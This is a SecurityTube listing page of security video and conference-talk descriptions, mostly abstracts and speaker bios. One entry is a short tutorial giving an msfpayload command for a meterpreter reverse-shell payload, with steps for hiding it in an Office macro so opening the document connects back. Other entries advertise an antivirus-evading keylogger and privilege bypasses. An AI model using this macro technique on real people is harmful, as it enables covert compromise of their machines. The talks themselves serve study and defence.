SecurityTube.Net

LFI Exploit via Log File Injection

Alone

In this video you will learn how to exploit LFI vulnerability using LOG file injection. He is using a Burp-Suite tool for exploiting LFI vulnerability.

SqlMap to Shell

Alone

In this video you will learn how to exploit a web application after exploiting a web apps you will get a shell. Basically In this video He is using an Advanced SQLMAP function to go from standard SQL injection to OS command execution.

Offensive Security 2013 - Social Engineering

Alone

This video is all about Social Engineering and Cyber warfare. In the start of this video - talk about Cyber war and afterwards you will learn new social engineering techniques for exploiting a human brain and also you will learn fundamental psychological flaws in the human brain.

Offensive Security 2013 - Web Application Hacking 101

Alone

This video is all about Web Application Hacking and securing it. In the start of this video you will focus on Become familiar with web application architecture and next familiar with common web vulnerabilities.

Meterpreter Swaparoo Post Exploit Script

Alone

In this video you will learn how to use Swaparoo post exploitation script for maintaining the access. After successful exploitation maintaining the access is the most important thing so this script will help you to maintain your access to a windows system. Basically he will replace the "Ease of Access Center" to "CMD" and when ever you try to open "Easy Of Access Center" you will get the CMD shell :)

Hack Multiple Systems with MSFCLI and Bash Scripting

Alone

In this video you will learn how to exploit multiple systems with MSFCLI and Bash Scripting. Justin Exploiting common vulnerabilities using MSFCLI basically we are writing a bash script and the script will follow our instructions and exploiting the system. This is useful because the whole process is automatic.

MS-SQL Injection 2 Meterpreter Shell (Credentials)

tinitee

In this video you will learn how to exploit MS-SQL for direct access with credentials to deliver your payload and command execution using cmdshell.

Using Metasploit Payloads in Macros

Un0wn_X

Hello guys today I taught of making a small tutorial on using metasploit payloads as macros and use them effectively inside word, excel, access documents. So as you know creating a normal metasploit backdoor executable using msfpayload, just give the ‘V’ options which msfpayload will generate the payload in VBScript. In this case I will use a reverse connection because I love it :) msfpayload windows/meterpreter/reverse_tcp LHOST= [Your local Host] LPORT= [Your Local Port] V > Shell.txt Well now you should create a new word file and go to view > macors and type a random name and create a new macro. Next open up our VBScript which is shell.txt and copy the top part in the file into the Visual Basic editor and save it. Top part in the sense which gives the required functions to execute our payload. After that copy the payload part into our document and you may make the size small and make the color change into white to make non suspicious. Use multi/handler which handles exploits outside the framework to listen. So that’s it now if correctly configured everything you should get a nice reverse connection back to you once the file is opened . Also we can convert any executable to VBS using exe2vbs.rb located at /pentest/exploits/framework/tools/.You can imagine beyond the scope how we can infect and I think more ideas may have occurred inside you ;) .I hope you learnt something. Thank You. Email: unownsec[at]gmail[dot]com Follow @UnownSec Un0wn_X

TROOPERS13 - Hacking and Craft (Jeff Gough)

Securitytube_Poster

Hackers and craftsmen have a lot in common. Today 3D printing and other rapid prototyping technologies are making it increasingly easy to make stuff. They also bridge the digital and the physical words, so increasingly software hackers are making inroads into hardware. However, there are ancient, simple and powerful craft techniques which are being neglected by this maker movement. In this talk I will show how high and low-tech tools can be combined to maximise the capability of the modern hacker-craftsman. I will present some of my recent work, including metalwork, jewellery, metal casting, and the design and construction of a full custom embedded electronic hardware product including firmware, circuit design, and mechanical integration. Finally I will discuss hacking-craft in the context of physical security. Can you 3D print your way into the data center? BIO: Jeff Gough is an electronic engineer, product designer and hacker. He is a masters student in Innovation Design Engineering at the Royal College of Art and Imperial College London. Recent projects include a pair of video display sunglasses for the band Muse, reverse engineering Epson inkjet printheads for micro-3D printing and the TROOPERS11 Nixie tube badge. He is currently working on personal anti-surveillance tools for dystopian futures.

TROOPERS13 - Flash Storage Forensics (Dmitry Sklyarov)

Securitytube_Poster

Lots of modern devices use flash memory as primary storage, and some of those devices (e.g. smartphones) often hold private data. There are common ways to protect stored data (with encryption). But is there easy ways to properly dispose sensitive information? BIO: Dmitry Sklyarov is a Lead Analyst at Positive Technologies and a lecturer at Moscow State Technical University. He did research on the security of eBooks and on the authentication of digital photos. Recent research projects involved mobile phone and smartphone forensics.

TROOPERS13 - The Interim Years of Cyberspace: Security in a Domain of Warfare (Robert M. Lee)

Securitytube_Poster

The cyberspace domain is one that nations and companies alike are quickly trying to secure as well as militarize, yet it encompasses users all around the globe. Thus it is a domain for everyone to take part in. This presentation makes the case that the cyberspace domain is currently in its interim years akin to the interim years of the aerial domain between World War I and World War II. It is in this period that people must get involved in the domain to guide the debates, doctrine, and education that will secure its place in history. The presentation will compare the current state of cyberspace to that of the interim years of airpower and make the case that security professionals and hackers alike must adapt and take part in a rapidly evolving environment. BIO: Robert M. Lee is the Founder and Director of hackINT which is a 501(c)3 non-profit organization dedicated to providing free training classes in the focuses of computer Forensics, Intelligence, Hacking, and Defense. He is also an Air Force Cyberspace Operations Officer currently stationed in Germany working under the Air Force Intelligence, Surveillance, and Reconnaissance Agency. He earned a BS from the United States Air Force Academy and will receive his MS in Cybersecurity – Computer Forensics from Utica College in 2013. Robert is also a graduate of the Air Force’s Undergraduate Cyber Training technical school. He has written papers on control system cybersecurity, cyber warfare, future nation-state cyber weapons, and advanced cyber threats for publications such as Control Global, SC Magazine, Australia Security Magazine, and Air and Space Power Journal. Robert has also presented on cyber related topics at conferences in Miami, FL; Seattle, WA; Washington DC; Prague, Czech Republic; Ramstein, Germany; Vienna, Austria; and London, England. He is routinely sought for his expertise on such subjects and is an active cyber advocate.

TROOPERS13 - Smart TV Security

Securitytube_Poster

Smart TV sold over 80,000,000 around the world in 2012. The next generation “smart” platform is becoming more and more popular. On the other hand, we hardly see security researches on Smart TV. This presentation will talk about what we’ve found and figured out on the platform. You can picture that Smart TV has almost all attack vectors that PC and Smart Phone have. Also, Smart TV has its own attack vectors such as remote controller. We’ll talk about attack points of Smart TV platform and discover security bugs we found. Moreover, what attackers can do on a hacked Smart TV. For example, fancy Smart TVs have many hardware modules like Camera or Mic which means bad guys could watch you in a way that users never notice about it. Even more, they possibly make Smart TV working 24/7 even though users turn off their TV that means #1984 could be done. In addition, we’ll point out a difference of viewpoint of leaked information type among on PC, Smart Phone and Smart TV. Lastly, we’ll give demo of capturing photos lively taken and sending to attacker’s server at this talk. BIO: Beist has been a member of the IT security field since 2000. His first company was Cyber Research based in Seoul, South Korea and focused on pen-testing. He then got a Computer Engineering B.A. degree from Sejong University. He has won more than 10 global CTF hacking contests in his country as well as passed DefCon quals 5 times. He has sold his research to major security companies like iDefense and ZDI (Recon ZDI contest). He has run numerous security conferences and hacking contests in Korea. Hunting bugs and exploiting them are his main interest. He does consulting for big companies in Korea and is now a graduate student at CIST IAS LAB, Korea University.

TROOPERS13 - You wouldn’t share a syringe. Would you share a USB port? (Sergey Bratus & Travis Goodspeed)

Securitytube_Poster

Previous work has shown that a USB port left unattended may be subject to pwnage via insertion of a device that types into your command shell (e.g. here). Impressive attack payloads have been delivered over USB to jailbreak PS3 and a “smart TV“. Not surprisingly, USB stacks started incorporating defenses such as device registration, USB firewalls, and other protective kits. But do these protective measures go far enough to let you safely plug in a strange thumb drive into your laptop’s USB port? We demonstrate that the scope of the OS code manipulation feasible through a USB port is much broader than could be expected. USB stack abuse is not limited to emulating HID keyboards or a few exotic devices — it is a clear and present danger throughout the USB software stack and can reach into any part of the operating system kernel and driver code. We show a simple development environment that is capable of emulating any USB device to engage whatever software on the host computer is meant to interact with such devices — and break any and all of the assumptions made by such software, leading to pwnage. In a nutshell, sharing a USB port belongs in the past — just as the era of downloading arbitrary executables and other Internet “free love”.

Root to Boot with De-Ice 1.100

Rahul_Roshan

De-Ice 1.100 is a vulnerable environment available for penetration testers to test their skills. The task is to get know the root password. In this video I am going to show you how to reach /etc/shadow. Rest all enjoy video.

Facebook Open URL Redirection Vulnerability 2013

ArulKumar

You must be signed into a facebook account to redirect sites.For more details about this bug,visit my blogspot http://arulxtronix.blogspot.in/2013/06/facebook-open-url-redirection_3515.html [#] Title : Facebook Open URL Redirection Vulnerability 2013 [#] Status : Unfixed [#] Severity : High [#] Works on : Any browser with any version [#] Author : Arul Kumar.V [#] Email : arul.xtronix@gmail.com

SamuraiSTFU - Smartgrid Testing Framework for Utilities - By Justin Searl

nullcon0x00

For years we've had pen test distributions like BackTrack and SamuraiWTF to help us perform penetration testing in most IT environments, however these distributions have been generic in nature to enable their use in a wide variety of different environments. One environment where these distributions have failed to meet the needs of their users is on SCADA and Smart Grid systems. We have just fixed this problem. Taking our experience running SamuraiWTF over the last four years, UtiliSec, a leading provider of security consulting services in the energy sector, has created an open source linux distribution specifically for Electric Utility security teams. SamuraiSTFU takes the best in bread security tools for traditional network and web penetration testing, adds specialized tools for embedded and RF testing, and mixes in a healthy dose of energy sector context, documentation, and sample files. Oh, and I shouldn't forget the inclusion of emulators for SCADA, Smart Meters, and other types of energy sector systems to provide leverage a full test lab. So whether you work for an electric utility, or are interested in gaining sufficient experience to start doing security work in these environments, checkout the project at SamuraiSTFU.org.

FTP Cracking with NCrack

tinitee

In this video you will learn how to crack a FTP service for password. Ncrack is a very powerful network service and protocol cracking tool. Using this tool you can crack lots of services like RDP,POP,FTP,SMB,SSH etc. This tool is powered by Nmap.org and very popular because of advanced usages and powerful for cracking process.

Automated Keylogger (Python)

Alone

In this video you will learn how to develop a python based automated standalone keylogger. This whole keylogger written in python and fully undetectable with Avs.

Offensive Security 2013 - Exploit Dev 102

Alone

This video is all about exploit development. This video will cover how to learn exploit development and where to start also you will learn how to develop your own shellcode using the same. For this you need some amount of knowledge about GDB, Assembly language etc. .

Offensive Security 2013 - Fuzzing - Exploit Dev 101

Alone

This video is all about Fuzzing and basics of exploit development. In the starting of this video you will understand what is fuzzing and how you can use it for developing a exploit code and shellcoding. This video is useful for penetration testers, Security analyst.

TROOPERS13 - Corporate Espionage via Mobile Compromise: A Technical Deep Dive

Securitytube_Poster

Corporate scale cyber espionage is a threat to keeping a leg up on the competition. Mobile phones are increasingly targeted by attackers and can be a powerful tool to gain entry to a company and exfiltrate intellectual property. We will examine how the ability of the mobile device to operate on either side of corporate boundaries exposes the company to risk. This talk will be particularly technical in describing the implementation of a reprogrammable USB device built upon the Linux gadget framework on Android used to penetrate traditional corporate defenses. We will also demonstrate an Android RAT specifically designed to aware of its surroundings, capable of recording sensitive audio, video, bluetooth, and wireless connections, while silently waiting to be plugged into a corporate laptop/desktop. Then the fun begins! BIO: David is a young software engineer and mobile security researcher. His cutting-edge work in Android and embedded systems has contributed to multiple patent-pending designs, and has recently provided expert consulting to DARPA and other government projects on mobile security. David has written papers on thin-client computing, innovated in the area of cryptographic systems for USB peripherals, and re-envisioned the defensive possibilities of mobile phone chargers. http://www.mitre.org/work/tech_papers/2012/12_0024/ http://mostconf.org/2012/papers/17.pdf http://www.mitre.org/news/envision/volume_4/dyer_weinstein.html

TROOPERS13 - Introducing Daisho – monitoring multiple communication technologies at the physical layer

Securitytube_Poster

Most communications media can be monitored and debugged at various levels of the stack, but we believe that it is most important to examine them at the physical layer. From there, the security of every level can be investigated and tested. The task of monitoring physical layer communications has become increasingly difficult as we try to squeeze more and more bandwidth out of our links. A passive tapping circuit can be used to monitor a 100BASE-TX connections, but no such circuit exists for 1000BASE-T networks. Our solution to this problem is Project Daisho; an open source hardware and software project to build a device that can monitor high speed communication links and pass all of the data back to a host system for analysis. Daisho will include a modular, high bandwidth design that can be extended to monitor future technologies. The project will also produce the first open source USB 3.0 FPGA core, bringing high speed data transfer to any projects that build on the open platform. As a proof of concept at this early stage, we will demonstrate monitoring of a low bandwidth RS-232 connection using our first round of hardware and discuss the challenges involved with the high speed targets such as 1000BASE-T and USB 3.0 that we will take on later this year. BIO: Michael Ossmann is known for his experience with radio communications technology and open source hardware design, having produced both the Ubertooth and HackRF as well as regularly teaching workshops on software defined radio. He has spoken about his work with software defined radio and Bluetooth at Troopers, Black Hat, DEF CON, ToorCon, ShmooCon and more. BIO: Dominic Spill has been building a Bluetooth packet sniffer since 2007; last year he took over as lead developer for the Ubertooth and has recently begun working with Michael on Daisho. He has previously presented his Bluetooth work at DEF CON, ShmooCon, USENIX WOOT, and Kiwicon. Both speakers have a passion for building open source tools to allow curious people to examine the technologies and protocols that we use to communicate.

TROOPERS13 - OAuth2 - Ready or not (here I come) - Dominick Baier

Securitytube_Poster

After a 3-year long struggle, the IETF finally released the OAuth2 specifications (RFC 6749 & 6750). While all the big players (like Google, Microsoft and Facebook) are already using it, more and more people want to follow. But there is big confusion about what OAuth2 really is, what its uses cases are and which problems it can actually solve. At the same time, also the security experts out there don’t really agree if OAuth2 is a complete failure, or not – or something in between. Dominick walks you through OAuth2, its use cases, dark corners and pitfalls. BIO: Dominick works as an associate consultant for the Germany-based company thinktecture (http://www.thinktecture.com). His main area of focus is identity management & access control in particular. He helps customers around the world implementing claims-based identity, single sign-on, authorisation and federation in their web applications, services and APIs. Dominick is an international conference speaker and the author of ‘Developing more-secure ASP.NET Application’ and co-author of the Microsoft Patterns & Practices ‘Guide to Claims-based Identity and Access Control’. You can find Dominick’s blog at http://www.leastprivilege.com and his various open source projects (which include the very popular security token service called thinktecture IdentityServer) at http://thinktecture.github.com/.

Internet Security - Cybercrime - Potential Attackers

Securitytube_Poster

In this video Prof. Dr. Christoph Meinel talk about Cyber crime and potential attackers. He will discuss about hacker from high school how they start doing hacking for fun and getting into a trouble. Topics : Potential Attackers Hackers from High-Schools and Universities Professional Hacker Criminals

Internet Security - Risk Analysis

Securitytube_Poster

In this video Prof. Dr. Christoph Meinel talk about Risk Analysis and giving intro to System analysis about vulnerabilities. Topics : • Introduction • Risks in Internetworking IT-Systems • Risk Definition and Analysis • Evaluation of Risks • Basic Risks of Internet

TROOPERS13 - The future of data exfiltration and malicious communication - Steffen Wendzel

Securitytube_Poster

This talk discusses practical aspects of recent developments of the scientific community in the area of network covert and side channels.The talk will highlight new covert channel techniques which cannot be entirely prevented with state of the art techniques as well as it will discuss side channels in networks (including building automation networks) as a subset of covert channels. Covert and side channels not only allow policy-breaking communication (e.g., for journalists or botnets) but additionally allow the remote monitoring of persons in buildings — a problem that is linked to the sensitive field of Ambient Assisted Living (AAL) and eHealth. Using these techniques, future attackers can monitor inhabitants in buildings, can adapt their covert channels automatically to new circumstances (e.g., change firewall rules or statistical changes within the network traffic), and can dynamically route in covert channel overlay networks. BIO: Steffen Wendzel is a 3rd year PhD student at the University of Hagen and a researcher at the Augsburg University of Applied Sciences. He is author of various scientific/professional papers and four IT-related books. His latest book “Tunnel und verdeckte Kanäle im Netz” (Springer-Vieweg) deals with network covert channels. His research interests comprise network covert channels, network protocol engineering and TCP/IP protocols, network security, administration and programming of Linux/Unix/BSD systems, and building automation security.

TROOPERS13 - Paparazzi over IP - Daniel Mende And Pascal Turbing

Securitytube_Poster

Almost every recent higher class DSLR camera features multiple and complex access technologies. For example, CANON’s new flagship features IP connectivity both wired via 802.3 and wireless via 802.11. All big vendors are pushing these features to the market and advertise them as realtime image transfer to the cloud. We have taken a look at the layer 2 and 3 implementations in the CamOS and the services running upon those. Not only did we discover weak plaintext protocols used in the communication, we’ve also been able to gain complete control of the camera, including modification of camera settings, file transfer and image live stream. So in the end the “upload to the clouds” feature resulted in an image stealing Man-in-the-Imageflow. We will present the results of our research on cutting edge cameras, exploit the weaknesses in a live demo and release a tool after the presentation. BIO: Daniel Mende is an ERNW security researcher specialized on network protocols and technologies. He’s well known for his Layer2 extensions of the SPIKE and Sulley fuzzing frameworks and has presented on protocol security at many occasions including Troopers, Blackhat, CCC, IT Underground and ShmooCon. Usually he releases a new tool when giving a talk. Pascal is his co-genius (think of Master Blaster in “Mad Max Beyond Thunderdome” .

TROOPERS13 - Hacking And Defending the big 4 Databases - Alex Rothacker

Securitytube_Poster

According to the Identity Theft Resource Center, in the past year and a half, there have been nearly 900 breaches and over 28 million records compromised. With the likes of Anonymous, LulzSec and government sponsored attackers continuously hacking into major corporations and government agencies, do you wonder if you’re next? No organization, industry, or government agency is immune to the proliferation of complex attacks and malicious behavior. Ensuring database security is a priority for organizations interested in protecting sensitive data and passing audits. Over the course of this presentation, a description of sophisticated methods used in invading enterprise databases will be discussed, and the evolution of the security issues and features in each will be provided. A demonstration of new and popular attacks will also be presented. The presentation will conclude by proposing essential steps IT managers can take to securely configure, maintain databases, and defend against malicious breaches entirely. BIO: Alex Rothacker is the Director of Security Research for Application Security, Inc.’s (AppSec) TeamSHATTER. In his role, Alex manages a team comprised of some of the world’s most renowned databases security researchers. TeamSHATTER is regularly credited for identifying critical database vulnerabilities and misconfigurations in leading database management systems. As an evangelist for database security, he is a regular speaker at security conferences and contributor to various security blogs. Before joining AppSec, Alex was a Director of Solutions at Visionics, a facial recognition software start-up. In addition, Alex has held various senior-level positions in the software industry. Alex holds an M.S. in Computer Science from New Jersey Institute of Technology and Diplom Informatiker(FH) from Fachhochschule Darmstadt (Germany).

Offensive Security 2013 - Reverse Engineering (x86) Workshop Day 2

Alone

This video will continue to part one of Reverse Engineering on x86. Please watch part one before watching this part 2. Now this video will cover advanced analysis using IDA pro, Debugging disassembly etc ..

Offensive Security 2013 - Reverse Engineering (x86) Workshop Day 1

Alone

This video is all about Reverse Engineering on x86 architecture. This workshop is good for pen-testers, incident responders, and security analyst. Outline: Static vs Dynamic (Overview), PE and ELF, Assembly, Registers, The Stack, Functions, IDA, Debugging, Note on Bytecode, Conclusion

TROOPERS13 - Understanding And Mitigating Large Scale DoS Attacks - Adem Sen

Securitytube_Poster

PDF : - https://www.troopers.de/wp-content/uploads/2012/12/TROOPERS13-Understanding+Mitigating_Large_Scale_DoS_Attacks-Adem_Sen.pdf In 2012, quite a few organizations have been exposed to large scale denial-of-service attacks. Still in some places there’s a lack of understanding and preparedness/response capabilities. This talk will provide a classification of common DoS attacks and the methods & tools used by the attackers. Furthermore different mitigation approaches will be discussed, together with their advantages/disadvantages and scenarios where they can (or can not) be applied. The speaker can & will provide first hand experience from being in charge to counter an attack of multi-gigabit scale and from several other case studies. BIO: Adem is a security expert with German Railways (DB Systel) where he is responsible for the corporate network’s and telecommunication’s security. He has been designing and implementing network security mechanisms for many large scale environments for over 10 years, covering high secure networks and high secure VoIP environments. He is specialized on network defense techniques and has vast experience in analysis and mitigation of DDoS attacks. E-Mail: senizer-AT-gmail.com Twitter: securityfreax

TROOPERS13 - Pitfalls of Vulnerability Rating And A New Approach Called ERRS

Securitytube_Poster

PDF : - https://www.troopers.de/wp-content/uploads/2012/12/TROOPERS13-Pitfalls_of_Vulnerability_Rating+A_New_Approach_Called_ERRS-ERNW_Rapid_Rating_System-Michael_Thumann+Matthias_Luft.pdf Just as most IT operations, security management has to deal with a permanent lack of resources. In order to address this lack and carry out effective security management and operations, the prioritization of tasks is crucial. This also holds true for the handling of data resulting from security assessments and vulnerability management. Even though there are several approaches for the rating of findings and vulnerabilities out in the wild, those hide several pitfalls (such as a lack of support for “chains and composites” or blurry impact perspectives) which will be outlined during this presentation. We will also present a new approach in vulnerability metrics that will allow a rapid rating both for auditors and internal governance departments and allows agile security practitioners to deal with “decision entropy”. BIO: Michael Thumann is the Chief Security Officer and the head of the ERNW.s application security team. He has published security advisories regarding topics like .Cracking IKE Preshared Keys. and buffer overflows in web servers or VPN software. Michael enjoys sharing his self-written security tools (e.g. .tomas . a Cisco Password Cracker., .ikeprobe . IKE PSK Vulnerability Scanner. or .dnsdigger . a dns information gathering tool.) and his experience with the community. Besides numerous articles and papers he wrote the first German book on pentesting that has become a recommended reading at German universities. In addition to his daily pentesting tasks he is a regular conference-speaker (incl. several Black Hat events, HITB and RSA Conference) and has also contributed exploit code to the Metasploit Framework. With more than 10 years of experience in computer security Michaels. main interest is to uncover vulnerabilities and security design flaws from the network to the application level and to reverse almost everything to understand the inner workings. BIO: Matthias Luft is a seasoned auditor and pentester with vast experience in corporate environments. Over the years, he developed his own approach in evaluating and reviewing all kinds of applications, technologies, and securtiy concepts. He’s one of the first researchers who revealed major design flaws and vulnerabilities in the approach of Data Leakage Prevention. During the last years, he focused on the area of cloud security and presented on scalability issues and trust assessments of cloud service providers. He is a regular speaker at international security conferences and will happily share his knowledge with the audience.

Internet Security - Weaknesses and Targets

Securitytube_Poster

"Internet Security - Weaknesses and Targets" is based on "Internet- & WWW-Technologies" and gives a detailed introduction on problems concerning Internet and Intranet security. After starting with some remarks on risk analysis and computer crimes, security weaknesses and targets are discussed in detail. Beside others the following topics are discussed in detail: human factor and technical failures, attacks on accounts and passwords, attacks on Internet protocol, misuse of design and programming errors, weaknesses in common operating systems, targets in the WWW, and viruses. The lecture course concludes with a discussion about the possibilities to detect attacks and intrusions and also describes ethical issues.

Burp Suite - Simple LFI

tinitee

In this video you will learn how to exploit LFI vulnerability using Burp Suite tool. Uploading a shell via access to /proc/self/environ using LFI vulnerability.

Extracting Badness from a PDF... in 4 ways!

Alone

In this video you will learn how to analysis the infected PDF file using four different tips & tricks. For analysis the pdf you need to download four tools called PDF parser, PDF IDE , PDF walker, PPDF etc ..

nullcon Goa 2013 - Hardware backdooring is possible - By Jonathan Brossard

nullcon0x00

This presentation will demonstrate that permanent backdooring of hardware is practical. We have built a generic proof of concept malware for the intel architecture, Rakshasa, capable of infecting more than a hundred of different motherboards. The first net effect of Rakshasa is to disable NX permanently and remove SMM related fixes from the BIOS, resulting in permanent lowering of the security of the backdoored computer, even after complete earasing of hard disks and reinstallation of a new operating system. We shall also demonstrate that preexisting work on MBR subvertions such as bootkiting and preboot authentication software bruteforce can be embedded in Rakshasa with little effort. More over, Rakshasa is built on top of free software, including the Coreboot project, meaning that most of its source code is already public. This presentation will take a deep dive into Coreboot and hardware components such as the BIOS, CMOS and PIC embedded on the motherboard, before detailing the inner workings of Rakshasa and demo its capabilities. It is hoped to raise awareness of the security community regarding the dangers associated with non open source firmwares shipped with any computer and question their integrity. This shall also result in upgrading the best practices for forensics and post intrusion analysis by including the afore mentioned firmwares as part of their scope of work.

Meterpreter via PowerShell Payload + UAC Bypass on Windows 7

Alone

In this video you will learn how to exploit a window 7. So for exploiting a windows 7 system Hodd3d using a powershell payload builder which executes a meterpreter shell in the memory then using metasploit we can bypass UAC restriction to take system.

Offensive Security 2013 - Rootkits / Code Auditing

Alone

This video is all about Rootkits and Code Auditing. In the start of this video covers rootkits and rootkit techniques for Windows and Linux system and the second half covers code auditing for software. Analysis the code for vulnerability identification and fixing the bugs.

Offensive Security 2013 - Windows Overview

Alone

This lecture will provide an overview of windows system and in the windows system - covering registry , registry hives, persistence mechanisms used by malware, Portable Executable (PE) file format overview etc. ..

Offensive Security 2013 - Linux Overview

Alone

This video is all about Overview of a Linux based system. The lecture will cover the basics of an OS kernel v's user space, system calls, unix permissions and Ruid vs euid and ext file system forensics. Persistence mechanisms used by malware in the UNIX and Linux system.

TROOPERS13 - Ghost in the Shell (Andreas Wiegenstein And Xu Jia)

Securitytube_Poster

PDF: - https://www.troopers.de/wp-content/uploads/2012/12/TROOPERS13-Ghost_in_the_Shell-Andreas_Wiegenstein+Xu_Jia.pdf Security conferences in the past years have made it clear, that common security vulnerabilities such as SQL Injection, XSS, CSRF, HTTP verb tampering and many others also exist in SAP software. This talk covers several vulnerabilities that are unique to SAP systems and shows how these can be used in order to bypass crucial security mechanisms and at the same time operate completely below the (forensic) Radar. We uncovered undocumented mechanisms in the SAP kernel, that allow launching attacks that cannot be traced back to the attacker by forensic means. These mechanisms allow to *actively* inject commands at any time into the running backend-session of an arbitrary logged on user, chosen by the attacker. We named this attack mechanism “Ghost in the Shell”. We will also demo how to use this attack vector to distribute malware to the attacked user’s client machine despite mechanisms in the SAP standard that are designed to prevent this. BIO: Andreas Wiegenstein has been working as a professional SAP security consultant since 2003. He performed countless SAP code audits and has been researching security defects specific to SAP / ABAP applications. As CTO, he leads the CodeProfiler Research Labs at Virtual Forge, a team focusing on SAP/ABAP specific vulnerabilities and countermeasures. At the CodeProfiler Labs, he works on ABAP security guidelines, ABAP security trainings, an ABAP security scanner as well as white papers and publications. Andreas has trained large companies and defense organizations on ABAP security and has spoken at SAP TechEd on several occasions as well as at security conferences such as Troopers, BlackHat, HITB, RSA as well as many smaller SAP specific conferences. He is co-author of the first book on ABAP security (SAP Press 2009). He is also member of BIZEC.org, the Business Security Community. BIO: Xu Jia is researching SAP security topics since 2006. His focus is on static code analysis for ABAP and he is the lead architect for a commercial SCA tool. Working in the CodeProfiler Research Labs at Virtual Forge, he also analyzes (ABAP) security defects in SAP standard software. Xu has submitted a significant number of 0-days to SAP, including multiple new forms of attack that are specific to SAP software. He already presented some of his research at the 16th IBS security conference, 2012 in Hamburg.

TROOPERS13 - Working title: “Your IPv6 default config meets FOCA (…and starts to cry)” (Chema Alonso)

Securitytube_Poster

Your laptop is probably working on IPv6 and probably you even don´t know it. Probably you need to stop configuring your IPv4 address when you cannot connect to your fileserver but you don´t know it. In this talk you are gonna see how an attacker can take advantage of your IPv6 default configuration in your laptop… with the Evil FOCA }:)) BIO: Chema Alonso is a Security Consultant with Informatica64, a Madrid-based security firm. Chema holds respective Computer Science and System Engineering degrees from Rey Juan Carlos University and Universidad Politecnica de Madrid. During his more than six years as a security professional, he has consistently been recognized as a Microsoft Most Valuable Professional (MVP). Chema is a frequent speaker at industry events (Microsoft Technet / Security Tour, AseguraIT) and has been invited to present at information security conferences worldwide including BlackHat Briefings, Defcon, ShmooCon, HackCON, Ekoparty and RootedCon. He is a frequent contributor on several technical magazines in Spain, where he is +involved with state-of-the-art attack and defense mechanisms, web security, general ethical hacking techniques and FOCA, the meta-data extraction tool which he co-authors. Twitter: @chemaalonso Blog: www.elladodelmal.com

TROOPERS13 - Detecting white-collar cybercrime: SAP Forensics (Juan Perez-Etchegoyen And Mariano Nunez)

Securitytube_Poster

PDF : - https://www.troopers.de/wp-content/uploads/2012/12/TROOPERS13-Detecting_white-collar_cybercrime_SAP_Forensics-Juan_Perez-Etchegoyen+Mariano_Nunez.pdf The largest organizations in the world rely on SAP platforms to run their critical processes and keep their business crown jewels: financial information, customers data, intellectual property, credit cards, human resources salaries, sensitive materials, suppliers and more. Everything is there – and attackers know it. Now, the big question arises: Has your SAP system ever been hacked? Is it compromised today? If your answer is “no”, are you sure? Do you know what to look for? Unfortunately, most organizations do not have this knowledge today, which only empowers the bad guys. For several years at Onapsis we have been researching on how cyber-criminals might be able to break into ERP systems, in order to help organizations better protect themselves. This has enabled us to gain a unique expertise on which are the most critical attack vectors and what kind of traces they leave (and don’t) over the victim SAP platforms. Join us in the first public presentation on how to do a forensic analysis of an SAP system, looking for traces of a security breach. Learn where fingerprints may have been left, understand which are the available system tools that may help you and which are their limitations. Watch several live demos of security breaches and find out how you may be able to detect that they took place, helping you assess the business impact and track down the attacker.

TROOPERS13 - UI Redressing Attacks on Android Devices (Marcus Niemietz)

Securitytube_Poster

PDF : - https://www.troopers.de/wp-content/uploads/2012/12/TROOPERS13-UI_Redressing_Attacks_on_Android_Devices-Marcus_Niemietz.pdf In this presentation, we describe novel high-impact user interface attacks on Android-based mobile devices, additionally focusing on showcasing the possible mitigation techniques for such attacks. We discuss which UI redressing attacks can be transferred from desktop- to mobile- browser field. Our main contribution is a demonstration of a browserless tap-jacking attack, which greatly enriches the impact of previous work on this matter. With this technique, one can perform unauthorized home screen navigation and attempt actions like (premium number) phone calls without having been granted appropriate privileges. To protect against this attack, we introduce a concept of a security layer that catches all tap-jacking attempts before they can reach home screen/arbitrary applications. BIO: Marcus Niemietz is a professional security researcher at the Ruhr-University Bochum in Germany. He is focusing on Web security related stuff like HTML5 and especially UI redressing. Marcus has published a book about UI redressing and clickjacking for security experts and Web developers in 2012. Beside that he works as a security consultancy and gives security trainings for well known German companies. Marcus has spoken on a large variety of international conferences.

TROOPERS13 - Malicious pixels: QR-codes as attack vectors (Peter Kieseberg)

Securitytube_Poster

PDF : - https://www.troopers.de/wp-content/uploads/2012/12/TROOPERS13-Malicious_pixels_QR-codes_as_attack_vectors-Peter_Kieseberg.pdf QR-Codes, a version of two-dimensional barcodes that are able to store quite large amounts of information, started gaining huge popularity throughout the last few years, including all sorts of new applications for them. Originating from the area of logistics, they found their ways into marketing and since the rise of modern smartphones with their ability to scan them in the street; they can be found virtually everywhere, often linking to sites on the internet. Currently even standards for paying using QR-codes were proposed and standardized. In this talk we will highlight possible attack vectors arising from the use of QR-Codes. Furthermore we will outline an algorithm for calculating near-collisions in order to launch phishing attacks and we will demonstrate the practical utilization of this technique. BIO: Peter Kieseberg is a researcher at SBA Research, the Austrian non-profit research institute for IT-Security. He received a Dipl. Ing. (equivalent to MSc) degree in Technical Mathematics in Computer Science from the Vienna University of Technology. His research interests include digital forensics, fingerprinting of structured data and mobile security.

TROOPERS13 - Virtual firewalls - the Good, the Bad and the Ugly - Ivan Pepelnjak

Securitytube_Poster

Anything is marketed as a virtual firewall these days, from contexts on physical boxes to hypervisor kernel modules and VMs with a kitschy GUI in front of iptables. This presentation will walk you through the virtual firewalls taxonomy, describe the major architectural options, and illustrate typical use cases with products from few established virtual firewall vendors (Cisco, VMware, Juniper, Vyatta/Brocade) and startups (LineRate Systems, Midokura). BIO: Ivan Pepelnjak, CCIE#1354 Emeritus, is the chief technology advisor at NIL Data Communications. He has been designing and implementing large-scale service provider and enterprise networks as well as teaching and writing books about advanced technologies since 1990. He’s author of several Cisco Press books, prolific blogger and writer, occasional consultant, and author of a series of highly successful webinars.

TROOPERS13 - Keynote Day 2 by Chris Nickerson

Securitytube_Poster

BIO: Chris is a security guy. He has a bunch of certifications (CISSP,CISA,ISO…etc) and a whole lot of experience to put into slide decks to make you say “wow…. he MUST know what he is talking about!” He likes to ask questions, play different roles, stand on the desk, and rant about his passions. Chris likes to get to the point and do work! He’s worked at Fortune 100 companies and ran a few InfoSec businesses of his own. Chris is the co-host of the Exotic liability Podcast, the author of the upcoming “RED TEAM TESTING” book published by Elsevier/Syngress and a founding member of BSIDES Conference

TROOPERS13 - Keynote Day 1 by Rodrigo Branco

Securitytube_Poster

